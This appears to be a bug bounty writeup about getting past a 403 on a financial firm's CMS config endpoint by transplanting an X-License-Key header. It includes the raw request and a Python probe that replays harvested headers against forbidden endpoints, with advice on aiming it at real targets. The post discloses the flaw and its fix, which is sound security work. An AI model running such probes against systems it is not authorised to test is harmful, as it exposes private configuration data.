403 forbidden bypass & Accessing config files using a header

This is my first writeup, on how I bypassed a 403 & accessed the config file.

vishnurajr
2 min read · Feb 17, 2022

Hi Everyone,

My name is vishnurajr. This is my first writeup: how I found a bypass for a 403 FORBIDDEN!

So let’s begin,

403 Forbidden :- The HTTP 403 Forbidden response status code indicates that the server understands the request but refuses to authorize it. Unlike a 401, the server is not asking for credentials, so re-authenticating does not help; a 403 bypass targets how the server decides to authorize a request, not the credentials themselves.

The target was in the financial sector. During recon I found a subdomain with a login page used by the branch executives of that organization. It needed three credentials to log in to its panel, and trying random credentials got nowhere. I then tried Google dorks to find endpoints, but nothing worked. At last I searched the domain in an archive directory and got some endpoints; most of them were not important, but one caught my attention. The endpoint looked like this:

/v1/redacted/redacted/redacted/cms/config?channel=desktop

I requested the endpoint and got a 403 Forbidden.

The next step was to bypass the 403. I tried every 403 bypass previously documented by security researchers, but nothing worked 😐 still forbidden, forbidden, forbidden!

After some time I went back to the Burp history looking for luck, and noticed that some requests, such as the login request, carried an X-License-Key header. I thought: let's copy that header over. I copied the X-License-Key header and pasted it into the config endpoint request:

GET /v1/redacted/redacted/redacted/cms/config?channel=desktop HTTP/1.1
Host: *.redacted.*
X-License-Key: xxxxxxxxxxxxxxxxxxx

With that one header added, the endpoint answered with the config instead of a 403. I had access to the config endpoint and the 403 Forbidden was bypassed.
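The technique above, turned into a repeatable probe, as an added example (this is not the author's tooling and not the target's code). The idea: collect every custom header seen on other requests in proxy history, replay the forbidden request once per header/value pair, and report which one flips the 403. Because the real target is redacted, a constructed in-process HTTP server stands in for it; the shortened path, the licence-key value and the JSON body are hypothetical.

```python
"""Header-transplant probe for a 403 endpoint (added example, not the author's code)."""
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Hypothetical licence key; the real value is redacted in the writeup.
ASSUMED_LICENSE_KEY = "demo-license-key-0001"
# Shortened stand-in for the redacted config path.
CONFIG_PATH = "/v1/cms/config?channel=desktop"

# Transport headers that never act as an authorization signal.
_SKIP = {"host", "content-length", "content-type", "connection",
         "accept", "accept-encoding", "user-agent"}


class _DemoTarget(BaseHTTPRequestHandler):
    """Constructed stand-in: the config endpoint authorizes on a static header alone."""

    def do_GET(self):
        if self.path == CONFIG_PATH:
            if self.headers.get("X-License-Key") == ASSUMED_LICENSE_KEY:
                status, body = 200, b'{"channel":"desktop","debug":true}'
            else:
                status, body = 403, b"forbidden"
        else:
            status, body = 200, b"ok"
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_demo_target():
    """Start the stand-in server on a free loopback port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), _DemoTarget)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def fetch_status(url, headers=None):
    """GET url with the given headers; return the status code even for 4xx/5xx."""
    try:
        with urlopen(Request(url, headers=headers or {}), timeout=5) as resp:
            return resp.status
    except HTTPError as err:
        return err.code


def harvest_candidate_headers(history):
    """From proxy history ({'path', 'headers'} dicts) collect every custom header
    together with the set of values it was seen with."""
    candidates = {}
    for entry in history:
        for name, value in entry["headers"].items():
            if name.lower() in _SKIP:
                continue
            candidates.setdefault(name, set()).add(value)
    return candidates


def transplant_headers(url, candidates):
    """Replay the request once per (header, value). Return the baseline status and
    the list of (header, value, status) pairs that turned it into a 2xx."""
    baseline = fetch_status(url)
    hits = []
    for name, values in candidates.items():
        for value in sorted(values):
            status = fetch_status(url, {name: value})
            if status != baseline and 200 <= status < 300:
                hits.append((name, value, status))
    return baseline, hits


# Constructed proxy history: a login and a branch-list request that both carried the key.
SAMPLE_HISTORY = [
    {"path": "/v1/login",
     "headers": {"Host": "example.test", "Content-Type": "application/json",
                 "X-Requested-With": "XMLHttpRequest",
                 "X-License-Key": ASSUMED_LICENSE_KEY}},
    {"path": "/v1/branches",
     "headers": {"Host": "example.test", "Accept": "application/json",
                 "X-License-Key": ASSUMED_LICENSE_KEY,
                 "X-Client-Version": "4.2.0"}},
]


def run_demo():
    """Spin up the stand-in target, probe it, tear it down; returns (baseline, hits)."""
    srv, base = start_demo_target()
    try:
        return transplant_headers(base + CONFIG_PATH,
                                  harvest_candidate_headers(SAMPLE_HISTORY))
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    baseline, hits = run_demo()
    print("baseline status:", baseline)
    for name, value, status in hits:
        print("%s: %s -> %d" % (name, value, status))
```

Against a real target, replace `fetch_status` with whatever sends through your proxy and feed `harvest_candidate_headers` the requests from Burp history; the probe only sends one extra header per request, so a hit tells you exactly which header the server trusts. A header that every client sends on ordinary requests, as the licence key here did, is not a secret and should never be the only authorization check on an endpoint.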

The config file contained a lot of information, like this:

Impact

  • An attacker can gain sensitive information about the target (the contents of the CMS configuration) without logging in, using only a licence key that the client already sends on ordinary requests such as login.

Fix:- They removed the X-License-Key header from every request. A static key that every client carries cannot serve as an authorization secret; the endpoint needs a server-side check tied to an authenticated session.
